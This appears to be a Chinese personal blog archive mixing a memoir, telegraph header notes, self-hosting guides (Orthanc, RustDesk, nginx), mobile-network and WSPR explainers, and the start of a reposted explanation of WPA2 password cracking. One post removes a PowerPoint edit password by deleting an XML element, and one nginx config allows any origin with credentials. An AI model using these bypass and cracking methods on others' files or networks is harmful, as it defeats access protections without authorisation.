三元是一只猫，一只被B君在一个雨天捡到的被流浪猫生下的小猫。
为了给她取名我们一帮人讨论了许久，苯环、光猫、鱼饼、二狗子、调制解调器，大家都有分歧，最后在打麻将时决定下了三元这个名字。

那天的麻将打的断断续续的，我们一边打牌，一边逗弄着小小的三元，看她窝在Q君怀里打呼噜。某一刻，B君发现三元的心跳和呼吸似乎有些快，但是我们并没有放在心上。过了一会三元在桌上仿佛肌无力一样的左半边身子无法支撑，以为是饿了，便喂了些牛奶，精神也好了不少。

直到D君胡成一把大三元。
三元小小的尾巴耷拉了下去。

深夜十二点，紧锁的24小时宠物医院门口，没了气息的三元。

还有被弥留的三元用力咬了一口的B君。

三元来到家里其实已经有好几天了，只是年纪太小，还不能打疫苗和体检，Q君本想等着过段时间给她送到宠物医院好好的走个流程。

但三元已经死了。

三附院深夜的急诊室没有医生。在我们到之前救护车送来了一个心脏骤停的病人，抢救室的蓝色帘子已经被拉了起来，把抢救位遮得严严实实。中毒处置位躺着一个喝醉酒的男人，嘴里一只嘟囔着什么，只是隔一会便喊一声死吧死吧。

四人静静的坐在长条椅上，三元在一旁的黄色垃圾桶里静静的躺着。为了一针狂犬疫苗。

心电监护仪在乱叫，听声音似乎医生做CPR也做不动了，上了机械复苏机，像打桩机一样的声音。大概是床上那人的家属吧，站在抢救室门口，高中生模样的男孩，在无声的安慰他的妈妈。
默哀。
那个酒精中毒的男人越喊越大声了，听的心烦。

出门透透气。
隔壁就是住院楼，门口停了一辆殡仪馆的白车。看起来是死者家属，眼眶红红的，在拿着单子和殡仪馆的人做最后的确认。戴着口罩的殡仪馆工作人员，拖冰冷着平板车和橙色的裹尸袋，寒气从运尸车的冰柜倾斜而下。
不忍再看。

如若三元再大一些，可能也会为她举行一场葬礼，而现在却什么都做不了，只能让她留在黄色的垃圾桶里。

医生回来了，叫我们去二附院。白等了半天。等到从二附院打完针出来到家，天已蒙蒙亮了。

屁猫还在家里，打开门就看见他趴在门口，瞪着一双金黄的大眼在黑暗中看着我们。
只是三元并没有跟着我们一起回来。

我爸妈常说我怕死的很，手上稍微有个口都像马上就要死了一样处理。只是我知道小口死不了，尽快处理好方便做事罢了。
生命是什么？
是物质的流动？
是灵魂的循环？
又或者是其他的什么？
无人知晓。
至少此时此刻你我仍旧存活，保持着生命活跃存在的基本状态。

生命是一种特征，物质存在的一种活跃形式。目前对于生命的定义在学术界还无共识，较流行的定义是一类维持体内平衡、具有生命周期和稳定的物质和能量代谢现象、能对刺激做反应、能进行自我复制和繁殖、进化的半开放物质系统。由细胞组成，能够成长、适应环境。其他定义有时包括非细胞生命形式，如病毒和类病毒。

生命 - 维基百科

正如曾经我写到，人类对于未知的恐惧是与生俱来的，虽然死亡是必然的，但此刻我们仍活在当下。逝者已逝，我们除了悼念，还要自己不停地向前走。
只是向前走。

我们以这一份来自上海的电报为例进行解读

1. ZCZC是报文的起始标头，用于表示该份电报的起始位置，在ZCZC标识之前的内容不是该份电报的内容，之后的才是；
2. BRE2999 ESY0139 BY9278 WLX2429是该份电报的自动转报系统转报冠流号，BRE、ESY、BY、WLX分别代表了电报转报电路中不同的转报局的冠号，数字则是该份电报在该转报局的转报流水号。目前已知WLX是中国电信杭州武林广场营业厅，BRE可能是中国电信上海武胜路云网中心。剩下的两个目前仍未找到有效资料得知具体是哪个转报局，很有可能是内部不对外营业的部分；
3. P代表该份电报的报类，P是普通电报、Z是政务电报、R是水情电报、X是新闻电报、K是汇款电报、C是公益电报、GA是公务公电、OBS是天气电报。目前普通公众可以接触到的电报业务报类仅有P报类；
4. HANGZHOU 浙江杭州 就是字面意思的报文的发报局名，表明该份电报由浙江杭州发出；
5. WX2429是该份电报的原来号数，通过查阅资料和对多份电报与发报纸的记录对比，笔者认为该冠流号为发报局的原始发报流水号数，因年代久远所以称呼发生了变化；
6. 71是该份电报的计费字数，可由此计算出该份电报的费用为0.14x71=9.94元；
7. 8是该份电报的发报日期；
8. 0845是该份电报的发报时间，为早上的8时45分；
9. 正文部分，在例图中没有体现；
10. NNNN是报文的末尾标头，用于表示该份电报的末尾位置，在NNNN标识之后的内容不是该份电报的内容，之前的才是，在例图中没有体现。

至于报头的完整格式其实还有更多的内容，受限于篇幅我无法在一篇文章中讲完，之后我会专门单独写一篇用于说明完整的电报报头。

参考资料
邮电部1984年8月3日（1984）邮部字359号

以下是做字操作的流程

用户拍发电报使用电码本内未编列的汉字时,应请发报人改按常用字或正规简化字书写,以免发生差错。如因地名、人名,专用名词等不能改写时,可用电码作字办法译电。

1. 将一个汉字分为上、下、左、右、中五个部位,再分别加上某字,或减去某字,共十种变化,用1到0号码代表:
   1=上加 2=下加 3=左加 4=右加 5=中加 6=上减 7=下减 8=左减 9=右减 0=中减

2. 查一个与未编汉字有关的汉字电码,在此电码前加写部位及应加或应减代表号码,即可说明新编的汉字。

• 收报人名址第七字“嶌【注】”,未编入电码本内,应在电报备注内加注“ADR7 7680 11472”,即“鸟”上加“山”。
• 电文第三字“腚”未编入电码本内,应在电报备注内加注“TW3 5139 91626 41353”,即“肝”右去“干”、右加“定”。

3. 凡有作字电码的电报,其备注内加注的计字序数,分别从收报人名址(不包括特别业务标识)、电文(包括署名)的第一字起算,名址部分写明ADR7（名址第七字组)，电文部分写明TW3 (电文第三字组)。

4. 国际、港澳电报遇有《标准电码本（修订本）》上未编列的汉字,不能采用国内电报的作字办法,而应在备注内用电码直接说明。具体说明顺序如下：作字的部位、原字电码、作字加减情况的说明。其中作字的部位电文或名址部分第几字中间，用斜划分开表示。电文译成TXT，名址译成ADDS，表示顺序的第几字可译成1ST、2ND、3RD、4TH……
   例如：名址第二字为嶌【注】，备注应填写为：
   2ND/ADDS 7680 0006 0502 1472

【注】该字为上“山”下“鸟”结构的字，由于该字为异体字，现时无法在unihan范围内找到“鸟”字为简体字的文字，故使用“鳥”字的文字作为替代，但由于该字为异体字，部分设备可能无法有效显示该字，以下为该字的正确文字样式图片：

参考资料
关于规定《标准电码本》（修订本）启用日期及注意事项的通知
邮电部电信总局一九八三年四月十五日（1983）电通字178号通知
邮电部电信总局一九八三年八月十日（1983）电外字398号通知
邮电部电信总局一九八三年三月一日（1983）电通字91号通知
附件一 电码作字办法

最近由于身体原因，经常需要去医院拍X光片。总所周知，由于各种原因，现在很多医院已经不再提供激光胶片了，转而变为在云端提供电子胶片。
熟悉我的人都知道，由于一些原因，我是一个稍微有点极端的信息安全自持派，虽然云胶片是由医疗机构提供并储存的，但是出于信息安全我仍然希望可以对相关数据进行自有自持，因此我在进行了一大圈的搜索之后找到了 Orthanc 作为电子胶片的内网存储调阅服务器。

电子胶片与激光胶片的优劣

既然提到电子胶片那么就不得不提到电子胶片与传统激光胶片之间的优劣比较。
电子胶片相较于传统激光胶片，具有易储存、易转移、清晰度高、价格便宜等优势。在特定的放射影像拍摄产生原始数据后甚至可以通过原始数据进行反向建模重构，有效提高了放射影像的可读性与实用性；而传统激光胶片相对于电子胶片则是几乎完全没有什么性价比了，可视维度少，严重受制于打印机的分辨率，保存方式要求较苛刻。
由此可见在未来电子胶片将会是大势所趋，逐步替代传统激光胶片。

Orthanc 简介

Orthanc是一款开源、免费的独立 DICOM 服务器程序，旨在让用户专注于 DICOM 文件本身的内容而非其复杂的格式与协议。由于其采用了 mimiPACS 方式构建，所以用户并不需要花费大量的时间在数据库管理和第三方依赖的处理中。

快速安装 Orthanc 服务端

1. 访问Orthanc的下载页面找到适合你的系统的版本下载按钮，下载最新版本的安装包，此处以 windows 版本为例。
2. 一路按默认安装流程进行程序安装
   
3. 安装完成后即可访问Orthanc自带的Web管理界面了
   
4. 通过管理界面左侧的上传按钮上传你通过当地的影像云平台/医疗机构获取的 DICOM 文件
   
5. 通过管理界面自带的网页阅片器查看你的电子胶片

配置内网访问

此时，虽然你已经可以在本机上访问Orthanc Explorer 2了，但是细心的人肯定会注意到地址栏里写的是localhost而非本机的IP地址，并且当你尝试使用http://IP:8042/访问时也会发现浏览器完全不买账，这是因为 DICOM 服务通常并不对本机之外的设备直接提供服务，但是如果你需要的话也不是没有办法。

通过 Nginx 提供反向代理

Nginx 作为一款轻量的 Web 服务器也是我们的老朋友了，具体的安装过程便不再赘述。
通过 Nginx 为 DICOM 服务器提供反向代理提供服务是较为常见的方式，你只需要在你的 Nginx 配置文件（通常是./nginx/nginx.conf，如果你像我一样用了vhost的话那就是./nginx/vhost/<filename>.conf）里加入以下几行代码即可：

1
2
3
4
5
6
7
8
9
10
11
12
13
14

Server {
    listen ...

    location /dicom/studies {
        proxy_pass http://127.0.0.1:8042/dicom-web/studies;
        proxy_set_header HOST $host;
        proxy_set_header X-Real-IP $remote_addr;
        rewrite /orthanc(.*) $1 break;
        add_header 'Access-Control-Allow-Credentials' 'true';
        add_header 'Access-Control-Allow-Headers' 'DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type';
        add_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS';
        add_header 'Access-Control-Allow-Origin' '*';
    }
}

直接通过 Orthanc 提供服务（以 Windows 为例）

如果你懒得折腾这些东西，只是和我一样希望尽快使用Orthanc，那么你现在需要做这么几件事：

1. 打开C:\Program Files\Orthanc\Configuration\，找到orthanc.json
2. 找到"RemoteAccessAllowed" : false,，将false替换为true
3. 找到"RegisteredUsers"，在注释后换行按照"<Username>" : "<Password>"的格式设置你的账号密码
   此方式设置的账号密码采用 HTTP Basic Authentication 方式进行身份验证，安全性相对较差，如需更高级的安全身份验证请自行选用 Nginx 反代方式进行配置

4. 于本机防火墙中开启 8042 端口的 TCP 入站放行
5. 于Services.msc中手动重启Orthanc服务即可在内网内其他设备上使用http://IP:8042/的方式访问Orthanc数据库了

配置 DICOM 访问

不过，虽然通过这种方式可以做到直接通过 Web 进行访问了，不过为了搭配相关的阅片软件（如我在 iPad 上使用的 IDV - IMAIOS DICOM Viewer），我们还需要开启Orthanc的 DICOM 设置：

1. 打开C:\Program Files\Orthanc\Configuration\，找到orthanc.json
2. 找到"DicomAet"设置你的DICOM AET
3. 找到"DicomPort"设置你的DICOM 端口，通常默认使用 4242
4. 找到"DefaultEncoding"设置你的DICOM 文件编码，默认为Latin1
5. 于本机防火墙中开启 4242 端口的 TCP 入站放行
6. 保存并于Services.msc中手动重启Orthanc服务

此时你就可以在支持 DICOM 的程序中设置你的 DICOM 服务器的相关设置并尝试进行 echo 测试查看 DICOM 服务是否联通了

但是此时你仍然无法通过 DICOM 获取储存于Orthanc内的电子胶片，你还需要继续做如下配置:
7. 打开C:\Program Files\Orthanc\Configuration\，找到orthanc.json
8. 找到"DicomModalities"，在注释后换行按照"<设备注释> : ["<阅读器的 DICOM AET>", "<阅读器设备的IP地址>", "<阅读器的 DICOM 端口>"]"的格式设置你的阅读器信息
9. 保存并于Services.msc中手动重启Orthanc服务
之后你便可以通过内网中的其他设备上支持 DICOM 协议的程序进行阅片了

参考资料

About Orthanc - Orthanc Offical
Orthanc Book - Orthanc Offical

被加密的PPT

有时我们收到一些PPT文件时会遇到文件被原作者使用密码进行编辑保护的情况，导致我们无法方便的使用源文件的模板或者修改内容，但是我们又无法获取到原始密码，那么我们就要想办法删除密码。
首先我们打开被加密的PPT发现出现了一个让我们输入密码的弹窗，但是很明显，我们不知道密码。

这时候，我们看到弹窗的右下角有一个只读按钮，点进去之后就会顺利的打开PPT的文件进行阅读。但是此时我们可以看见开始菜单栏里的所有按钮都是灰色的，也就是处于被保护状态，无法被编辑。

那我们该怎么处理呢？

解包PPT

首先，我们需要对PPT有一个认知，那就是PPT的本质是一个压缩包，里面是由许多xml文件记录文件的参数信息组成的。换而言之，PPT文件是可以被压缩软件解压的。
那么事情就会变的很简单，既然PPT本质上是由一堆xml文件组成的，那么加密的密码也必然会被写在这一堆xml文件里，只要找到并删掉那就可以对文件为所欲为了嘿嘿嘿🤠。
于是，我们就可以进行如下的操作来解压出源文件的原始xml：

1. 将原有的文件 1.pptx (例名)复制一份副本出来，并重命名为 1.zip；
   
2. 右键 1.zip并解压；
   
   解压之后我们就获得了源文件的原始xml。

淦密码！

现在我们已经把原始xml解压出来了，那么我们要怎么找到密码写在哪个文件里呢？很明显，作为一个加密手段，源文件的密码不会作为明文进行存储，所以原密码必然是被加密过的。
现在，我们找到 /ppt/presentation.xml 并打开，这里面存储着我们解压出的ppt的所有原始文件信息，其中也包括加密文件的密码：

但是对着这么一大坨xml，眼睛都看花了，鬼知道啥写的啥啊！
很明显，开发者也不是傻子，根据开发原则，文件中的变量名需要尽可能和功能匹配，那么我们只需要找一下类似于password``Verify的字段就好了。经过搜索我们找到了<p:modifyVerifier .../>这个字段，很明显，这个字段写着的就是源文件的加密验证部分了。我们直接把这个字段删掉保存文件即可。

完工！

现在，密码已经被删除了，那我们要如何把删掉密码的文件重新变回PPT呢？非常简单：

1. 把文件夹重新压缩为 1.zip;
2. 重命名文件为 1.pptx
   打开文件就会发现已经可以编辑啦！
   

总结

在这次的问题中，我们需要注意到以下几点：

1. PPT的本质是一个压缩包
2. 密码验证是文件的一部分，必然会存在于源文件的配置中

此外，这一方法理论上也可以扩展到所有的MS Office格式文件中，至于是否可用，需要各位读者自行验证，本人不做过多赘述与测试。

感谢阅读！

— 已经到底嘞 —

参考资料

16进制文件头笔记及文件类型判断代码 - 花月世界

搭建服务器环境

RustDesk 的服务器支持 Debian/Ubuntu/CentOS/Windows/Docker 环境搭建，本次我选择了在 Ubuntu20.04 LTS 的服务器上搭建，毕竟有公网IP使用会更方便。

第一步 下载服务端程序

在Github Releases下载最新版本的 rustdesk-server-linux-amd64.zip 服务端程序压缩包，unzip 解压后会得到 hbbs 和 hbbr 两个文件。
通过sudo ./hbbs -h可以得知 hbbs 是 Rustdesk 的ID服务。同样的，通过sudo ./hbbr -h可以得知 hbbr 是 RustDesk 的中继服务器。

第二步 启动基础服务端

在服务器上运行hbbs和hbbr，官方建议使用pm2管理服务。

1
2
3
4
5
6

# 直接启动
sudo ./hbbs
sudo ./hbbr
# 在pm2中启动
sudo pm2 start ./hbbs
sudo pm2 start ./hbbr

默认情况下，hbbs 监听21115(tcp), 21116(tcp/udp), 21118(tcp)，hbbr 监听21117(tcp), 21119(tcp)。务必在防火墙开启这几个端口， 请注意21116同时要开启TCP和UDP。其中21115是hbbs用作NAT类型测试，21116/UDP是hbbs用作ID注册与心跳服务，21116/TCP是hbbs用作TCP打洞与连接服务，21117是hbbr用作中继服务, 21118和21119是为了支持网页客户端。如果不需要网页客户端（21118，21119）支持，对应端口可以不开。

第三步 进阶配置

自定义服务端口

如果你不想使用程序默认的端口，那么你可以在启动 hbbs 时使用 -r 指定端口：

1
2
3
4

# 直接启动
sudo ./hbbs -r <主机的地址[:port]>
# 在pm2中启动
sudo pm2 start ./hbbs -- -r <主机的地址[:port]>

hbbr 则是使用 -p 指定：

1
2
3
4

# 直接启动
sudo ./hbbr -p <主机的地址[:port]>
# 在pm2中启动
sudo pm2 start ./hbbr -- -p <主机的地址[:port]>

设置无正确key禁止建立非加密连接

在 hbbs 首次运行时，会自动在运行目录下生成 id_ed25519 和 id_ed25519.pub 两个文件，分别存储着用于连接加密的私钥和公钥。
在后面进行客户端配置的时候，我们会需要在客户端设置中填写一个key用于连接服务器。
出于安全性考虑，我们需要设置无正确key禁止建立非加密连接：

1
2
3
4
5
6

# 直接启动
sudo ./hbbs -k _
sudo ./hbbr -k _
# 在pm2中启动
sudo pm2 start ./hbbs -- -k _
sudo pm2 start ./hbbr -- -k _

服务端程序信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

*@*:~/rustdesk# sudo ./hbbs -h
hbbs 1.1.6
Purslane Ltd. <info@rustdesk.com>
RustDesk ID/Rendezvous Server

USAGE:
    hbbs [OPTIONS]

FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information

OPTIONS:
    -c, --config <FILE>                   Sets a custom config file
    -k, --key <KEY>                       Only allow the client with the same key
        --mask <MASK>                     Determine if the connection comes from LAN, e.g. 192.168.0.0/16
    -p, --port <NUMBER(default=21116)>    Sets the listening port
    -r, --relay-servers <HOST>            Sets the default relay servers, seperated by colon
    -R, --rendezvous-servers <HOSTS>      Sets rendezvous servers, seperated by colon
    -M, --rmem <NUMBER(default=0)>        Sets UDP recv buffer size, set system rmem_max first, e.g., sudo sysctl -w
                                          net.core.rmem_max=52428800. vi /etc/sysctl.conf, net.core.rmem_max=52428800,
                                          sudo sysctl –p
    -s, --serial <NUMBER(default=0)>      Sets configure update serial number
    -u, --software-url <URL>              Sets download url of RustDesk software of newest version

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

*@*:~/rustdesk# sudo ./hbbr -h
hbbr 1.1.6
Purslane Ltd. <info@rustdesk.com>
RustDesk Relay Server

USAGE:
    hbbr [OPTIONS]

FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information

OPTIONS:
    -k, --key <KEY>                       Only allow the client with the same key
    -p, --port <NUMBER(default=21117)>    Sets the listening port

客户端配置

Windows/Linux/MacOS等桌面客户端

1. 安装运行 RustDesk 客户端
2. 点击 ID 右侧的菜单按钮，选择“ ID/中继服务器”
   
3. 在 ID 服务器输入框中输入 hbbs 的域名或 ip 地址，另外两个地址可以不填，RustDesk 会自动推导（如果没有特别设定），中继服务器指的是hbbr（21117）端口。
   
4. 填写由服务端生成的key并保存：

   1	cat <运行目录>/id_ed25519.pub

   V1.2.0以前的RustDesk客户端不支持WayLand显示设备，如果需要使用支持WayLand显示设备的客户端请访问Github Pre-Releases。如果您的设备为X11显示设备则不受限制。

Android/iOS客户端

1. 安装运行 RustDesk 客户端
2. 选择设置-ID/中继服务器
3. 在 ID 服务器输入框中输入 hbbs 的域名或 ip 地址，另外两个地址可以不填，RustDesk 会自动推导（如果没有特别设定），中继服务器指的是hbbr（21117）端口。
4. 填写由服务端生成的key并保存：

   1	cat <运行目录>/id_ed25519.pub

   在以上设置全部完成之后即可通过自建的服务器进行远程桌面连接了。

参考资料

RustDesk Docs

承载功能的移动网络

在移动通信系统中存在着三张网，分别是接入网、承载网和核心网。在我们日常使用移动网络进行通信的过程中，这三张网都是必不可少的。我们对这三张网进行一个简单的解释就是：接入网用于让用户接入网络之中，承载网用于承载传输用户和网络之间的数据，而核心网是用于处理用户数据和路由的中心结构。而行程卡的主要实现原理就和核心网有关。
在核心网中有这么两个部分，分别叫做HLR和VLR。

功能实现的组件

HLR (Home Location Register) ，中文叫做归属位置寄存器，其中包含有被授权使用GSM核心网的各个移动电话签约用户的详细信息。在一个通信系统中通常存在多个HLR，用于记录不同开户地点的用户详细信息。虽然HLR有多个，但是同一个用户的IMSI/MSISDN在同一时间只可以与唯一的HLR进行签约而这些信息会被用于终端和网络联系之间的鉴权。
举一个简单的例子，我在A市的中国电信申请了一个用户号码为18900001234的手机号并完成开户，那么这个用户的详细信息就会被存储于A市中国电信的HLR中，而不会存储在B市的HLR中。
这时可能就会有读者对此感到疑惑：既然一个用户的信息只会存储在一个地方的HLR之中，那么漫游是如何实现的呢？这里我们就要提到刚刚还没说的VLR了。
VLR (Visitor Location Register)，中文叫做拜访位置寄存器，其中会存储漫游到一个MSC所提供服务的范围的签约用户的数据。比如还是刚刚的号码为18900001234的用户，在他从A市移动到B市之后，为了他的号码可以正常使用，我们需要在B市的数据库中记录一个这个用户的数据。但是此时这个用户的详细信息已经存储在A市的HLR中，B市的HLR中不能也不可能有这一用户的信息，那么B市的VLR便会通过信令从A市的HLR中获取一份临时的用户数据以保证用户的网络使用正常。
HLR中的数据是固定保存的，类似于ROM中的数据；而VLR中的数据是临时存储的，类似于RAM中的数据。

原理分析

对HLR和VLR有基础了解之后，我们就可以简单的对行程卡的原理进行解释了：
当用户常驻于一个城市时，当地的HLR/VLR中会存储一份该用户的数据并会在系统设定的时间向该用户归属地的HLR进行数据上报。同时记录数据会根据数据库中的时间记录得出该用户在某城市是否存在逗留记录。
行程卡是一个在特殊时期利用现有数据进行防疫追踪的好工具，在防疫工作中起到了至关重要的作用。
愿疫情早日结束。

参考资料

网络交换子系统 - 维基百科
基站与小基站系统简介 - 大大通
什么是承载网，核心网和接入网 - 知乎

组织行为学的概念和研究内容

组织行为学的概念及学科性质

概念

• 组织行为学的研究对象是人的心理和行为的规律性；
• 组织行为学的研究范围是特定组织中人的心理和行为的规律性；
• 组织行为学的研究目的是提高预测、引导及控制人的行为的能力，以提升工作绩效及员工满意度

学科性质

组织行为学的学科性质表现在以下几个方面：

• 跨学科性
• 系统性
• 权变性
• 实用性
• 科学性

组织行为学的研究内容

组织行为学的研究内容是研究一定组织中人的心理和行为的规律。
组织中人的心理和行为按不同的层面分为以下三个层面：

• 个体心理与行为
• 群体心理与行为
• 组织心理与行为
  组织行为学的研究内容可分为四大块：
• 个体心理与行为
• 群体心理与行为
• 组织行为
• 领导行为

个体心理与行为研究

个体心理是个体在组织中因角色地位或不同的情境而表达出的心理现象。
个体行为是个体在组织环境下的所作所为。

群体心理与行为研究

群体心理与行为研究主要包括群体对个人行为的影响、影响群体行为的因素、沟通、团队建设、群体冲突及管理等。

组织行为研究

组织行为研究主要包括组织结构、组织变革与发展、组织文化、组织学习等问题。

领导行为研究

领导行为研究包括领导理论、激励理论与实务两大部分。

组织行为学的产生与发展

组织行为学的学科基础

组织行为学是一门应用型的行为科学，它是在心理学、社会学、社会心理学、人类学和政治学等多门学科的基础上建立起来的。

心理学

心理学是测量、解释、引导及改变人的行为的一门学科。

社会学

社会学研究处于社会中的人的行为。

社会心理学

社会心理学是研究个体和群体的社会心理现象的心理学分支，是心理学和社会学相结合的产物。

人类学

人类学是从生物和文化的角度对人类进行全面解释的学科群。

政治学

政治学研究在政治环境中个体和群体的行为，其具体的研究课题包括冲突的结构、权利的分配和人们如何为了个人利益而操纵权力。

组织行为学的产生

组织行为学是在组织管理学和人事管理学的基础上产生和发展而来的，是组织演变、管理理论发展的必然结果，与管理学、工业心理学、管理心理学、组织心理学有着历史渊源。

发展历程

• 1911年，泰勒《科学管理管理》出版，管理学成为独立学科，早期科学管理理论形成
• 1912年闵斯特伯格出版《心理学与工业效率》，首先将心理学运用至工业管理，*工业心理学；形成
• 20世纪20年代，美国心理学家梅奥主持“霍桑实验”，发现工作群体重要性并提出人际关系学说，使建立在群体理论之上的社会心理学研究真正起步，使学术界对各类关系对人们的心理和行为的影响有了足够的重视
• 1958年，斯坦福大学的莱维特出版研究著作《管理心理学》，管理心理学体系形成
• 20世纪60年代初，莱维特在为《心理学年鉴》所著文章中首先采用“组织心理学”一词，进一步将管理心理学的研究扩大到组织心理的研究，目的是要承担比个体差异测定更广泛的组织问题研究，组织心理学体系形成
• 自20世纪60年代起，组织心理学从各大心理学系转入管理学院、系，吸收了大量的社会心理学家、社会学家和人类学家，从这批人中产生的研究项目被命名为“组织行为学”，组织行为学正式产生

（后暂略）

前几天服务器由于某v2升级出现了一些问题导致整个系统被我越修越坏的事我不想再提了，总之就是因为这个事情小木屋中心服务器又双叒叕重装了一次系统。

不过毕竟难得重装一次系统，就想着顺便把之前看见的某Nginx的Google反代模块安装上，结果安装过程不知道哪一步出了问题，于是我就 sudo find / -name nginx 把能删的东西删了个遍（注：这个模块需要编译安装所以Nginx是野编译来的），然后用 apt-get 重装了一下nginx，但是安装之后运行nginx一直报 nginx: [emerg] open() "/etc/nginx/nginx.conf" failed (2: No such file or directory)。

排障过程

首先，遇到这种问题我们肯定先考虑是配置文件残留，先进行一次 sudo apt-get remove --purge nginx 把Nginx卸载掉，然后sudo find / -name nginx 把能删的东西全部删个遍，确保没有文件残留，然后 sudo apt-get install nginx 重装完事。

不出意外的话，就要出意外了。在进行完以上操作之后，执行nginx指令发现 nginx: [emerg] open() "/etc/nginx/nginx.conf" failed (2: No such file or directory) 并未消除，使用 sudo find / -name nginx.conf -type d 搜索后发现系统中没有该文件存在。

那么问题还会出在哪里呢？会不会是Nginx的依赖未卸载导致的问题呢？再次使用 sudo apt-get remove --purge nginx 对Nginx进行卸载，再执行 sudo apt-get autoremove 卸载未卸载的Nginx依赖程序，重新安装Nginx之后发现 nginx: [emerg] open() "/etc/nginx/nginx.conf" failed (2: No such file or directory) 并未消除。

这就很神奇了啊朋友们，对配置和依赖都进行清除之后重装居然还是缺少文件，看来问题不是出现在配置文件和依赖程序上了。那么我们还有什么办法呢？

解决方案

在检索资料后，我发现可以用dpkg查找和Nginx有关的程序，于是执行了 sudo dpkg --get-selections|grep nginx 指令，查找系统中和Nginx有关的程序，其中有一个程序 nginx-common 疑似和该问题存在关联，执行 sudo apt-get remove --purge nginx-common 将该程序进行卸载，重新执行 sudo apt-get install nginx，发现问题解决。

问题总结

在对apt包库进行检索后，发现了这么一段描述 This package contains base configuration files used by all versions of nginx.，可以判断问题就是由此包产生。由于卸载Nginx时未卸载该包，重新安装后未能正确释放配置文件至指定文件夹导致问题出现。

参考资料

软件包：nginx-common（1.22.0-3.1） - Debian
nginx配置失败，卸载后重装无 nginx.conf文件 - haojuntu

参考资料

hexo-blog-encrypt README - D0n9X1n
未了终末 - Candinya

失踪7年的马航MH370终于找到了？- 澎湃新闻
失联7年，马航MH370精确位置找到！ - 腾讯新闻

在对各大媒体的新闻报道进行阅读后，我发现绝大部分都提到了这么一句话：“英国专家称其使用一项革命性跟踪技术发现了马来西亚航空370客机。”
作为一个关注新技术的极客（伪），我很理所应当的被这句话吸引了。革命性的跟踪技术这个描述本身就很吸引人，我就去检索了一下外国媒体的报道。
在外媒的报道里，我发现了一个很熟悉的词：WSPR。而这个WSPR就是国内媒体所提到的所谓的“革命性跟踪技术”。
大家肯定会觉得这么一个新闻我挂一个[ #业余无线电 ]的分类很奇怪吧。今天我们就来借这条新闻的热度，给大家介绍一下业余无线电里很常用的一种通信方式WSPR——也就是那个所谓的“革命性跟踪技术”。

WSPR，英语全称Weak Signal Propagation Reporter，翻译成中文就是弱信号传播报告器，是一种设计用于业余无线电操作员之间的弱信号无线电通信程序。这一协议由Joe Taylor（呼号K1JT），于2008年提出并发布了>一个最初的通信程序。后来WSPR被一个小团队接手开发并基于GNU许可证进行开源。该程序旨在发送和接收低功率传输，以测试MF和HF频段上的传播路径。

WSPR通过使用低功率的信号传输来探测潜在的传播路径。传输内容包含电台的呼号、梅登黑德定位网格和发射机的发射功率，例如”BH6AOV OL63 37”即表示该信号来自网格位于OL63的BH6AOV发射，发射功率为10^3.7毫瓦 。
WSPR可以解码到2500Hz带宽内信噪比至低为-28dB的信号。当运行WSPR程序的电脑联网时，可以将接受报告上传至wspr.net的中央数据库。
WSPR的发射类型是F1D，FSK调制，发射时需要进行时钟同步。通常来说一个WSPR台站包含一台计算机和一个收发器。
这个就是WSPR信号的音频↓

说了这么多，让我们转回头看一看在这次新闻里Richard Godfrey（也就是英国专家，下称R.G.）是怎么借助WSPR寻找MH370的。

前面我们提到，“当运行WSPR程序的电脑联网时，可以将接受报告上传至wspr.net的中央数据库。”，这一次，R.G.在2021年5月时提出建议检查WSPR的历史数据来查找2014年3月8日时MH370航班的飞行路径，并表示其中“有518条独特的传输路径穿过了马来西亚附近的区域、马六甲海峡和印度洋。借助每两分钟上传一次的WSPR记录和每小时一次的GPS定位我们有机会对MH370进行双独立信号来源探测定位”。
根据R.G.提出的方法，飞机在飞行过程中会对WSPR信号产生干扰，信号会在飞机机身上反射从而出现“非正常”的传输信号与距离，从而通过这一方法反推出MH370的飞行轨迹。
但是在对相关新闻进行检索时，我也发现一些分析指出，在这样的距离下根据平方反比定律，飞机机身反射的能量非常小，甚至不及常规天波信号因多径传播效应锁产生的方差，认为R.G.的方法仍旧有待商榷。

无论结果如何，我们都希望能够早日找出残骸，查明事实真相。
为全体遇难者默哀。

参考资料

WSPR (amateur radio software) - Wikipedia
Malaysia Airlines flight MH370 left ‘false trails’ before disappearing, new research suggests - ABC News
7年了，马航MH370找到了？英专家：当年搜救只偏28公里！失联真相将见天日？- 澎湃新闻
MH370 AND WSPR: AIRCRAFT SCATTER ON HF – A CRITICAL REVIEW - DK8OK

本文全文转载自无线网络WPA2加密的破解 - Zhou_Yuxin，在此致谢原作者
另外感谢@喵叔 帮忙联系到原作者获得转载授权

终于等到了这一天！平时学习任务繁重，没太多时间倒腾自己想弄的东西。最近终于抽出了3天，专攻了一下WPA2的加密方式，并且自己用php和C写出了代码。
在此首先感谢Sword York在slinuxer上发表的文章《WPA/WPA2-PSK认证过程》，如果没有他的python代码演示，我真不知道要如何下手。

阶段一：WPA2破解原理

WPA2相比WEP破解难度增加了很多，一个关键原因就是，WPA2的每次会话所使用的密钥都不相同，即每次会话都会随机生成一个临时密钥以加密数据。而这个临时密钥，则是在客户端连接上热点时，双方协商产生。因此，只有捕获了WPA2认证时的四次握手（我发现其实只需要前两次握手），才能破解密码。而破解密码只能使用穷举字典攻击，即每次试验一个可能的密码，然后按照WPA2的认证流程来产生哈希值，如果与握手包中的一致，那么极有可能就是正确的密码了。

因此，破解WPA2的关键就是两点——握手包、字典。

阶段二：WPA2认证过程

为了下述方便，下文中接入点就写作AP，工作站就写作STA。并假设下文所描述的认证过程是AP与一个合法的STA之间进行的。

而且出于一定的功利性，下文只讲述破解所需的前两次握手。

WPA2的认证过程是发生在Authentication与Association之后的。在四次握手开始之前，AP与一个合法的STA都已经知道了SSID和各自的MAC地址（AP的MAC地址记作AP_MAC，STA的MAC地址记作STA_MAC）。

在第一次握手之前：

AP与STA都知道wifi密码password、SSID，因此，通过算法

1

psk=pbkdf2_sha1(password,ssid,4096,64);

可以计算得到psk。其中password就是pbkdf2_sha1算法的密钥，ssid就是“盐（salt）”，4096是802.11规范规定的迭代次数，而64表示生成的psk是一个64字节的数据。pbkdf2_sha1算法可以参考《pbkdf2-shaX摘要算法以及C语言实现》。
之后，AP随机生成一个32字节的随机数，叫做AP_Nonce。
